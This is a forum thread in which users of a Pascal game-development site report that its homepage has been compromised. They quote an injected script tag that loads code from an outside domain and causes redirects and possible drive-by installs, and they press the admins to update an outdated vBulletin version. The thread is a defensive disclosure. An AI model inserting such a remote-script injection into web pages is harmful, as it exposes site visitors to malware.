Page 1 of 2 12 LastLast
Results 1 to 10 of 19

Thread: Site hacked?

  1. #1

    Site hacked?

    Visited the homepage, and got a series of redirects through a bunch of sites without me doing anything, and I discovered a very suspicious script in the html for the home page:

    <script type="text/javascript" src="http :// kokosina.in/1"></script>

    It's near the bottom. It is obfuscated, so likely malicious. Checking my system out now to see if I received an unwelcome drive-by install.

  2. #2
    PGD Staff / News Reporter Stoney's Avatar
    Join Date
    Jan 2005
    Location
    Germany
    Posts
    316
    Blog Entries
    4
    I'm getting a warning from Chrome about PGD having some malicious code every now and again.
    Freeze Development | Elysion Game Framework | Twitter: @Stoney_FD
    Check out my new book: Irrlicht 1.7.1 Realtime 3D Engine Beginner's Guide (It's C++ flavored though)

    Programmer: A device for converting coffein into software.

  3. #3
    https://www.vbulletin.com/forum/show...e-Getting-This

    Just noticed that PGD is still running the highly exploitable 4.1.3 version of VB.

    You guys have GOT to keep this thing updated, or people are going to get infected all the time.
    Last edited by Murmandamus; 23-12-2011 at 06:41 PM.

  4. #4
    avast always comes up with a warning when I open pgd

    kokosina.in/1
    The views expressed on this programme are bloody good ones. - Fred Dagg

  5. #5
    Yep, that's it. Read the thread on the vbulletin.com site I posted above; it's a widespread problem, and it can be a very nasty infection for users if they don't have updated software/AV.

  6. #6
    Well, no malicious stuff installed on my system, but it's just a matter of time with that injection hole sitting there.

  7. #7
    I'll be in the chat room if anyone needs more info. Not going to keep refreshing the page here since I have to do so with AV off.

  8. #8
    Co-Founder / PGD Elder WILL's Avatar
    Join Date
    Apr 2003
    Location
    Canada
    Posts
    6,108
    Blog Entries
    25
    We are doing a site migration soon, I was trying to hold off updates until then. Looks like I might have to do an update sooner than I hoped before the move. This doesn't seem to affect Mac users, but I do consider it a major issue for all the Windows. It also makes us look bad too.

    Hopefully such attacks will become less likely once we've moved to a much more secure host.
    Jason McMillen
    Pascal Game Development
    Co-Founder





  9. #9
    Quote Originally Posted by WILL View Post
    We are doing a site migration soon, I was trying to hold off updates until then. Looks like I might have to do an update sooner than I hoped before the move. This doesn't seem to affect Mac users, but I do consider it a major issue for all the Windows. It also makes us look bad too.

    Hopefully such attacks will become less likely once we've moved to a much more secure host.
    Only if your host is the one taking care of forum software updates, lol.

  10. #10
    WILL, you REALLY need to fix this ASAP. Your site is attacking your users *right now*. It's not a cosmetic issue; there's a malicious piece of code that your site is serving to your users every time they load the page. That forum thread on vBulletin.com tells you how to fix it.

    If it were me, I would shut down the board until it is fixed.

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •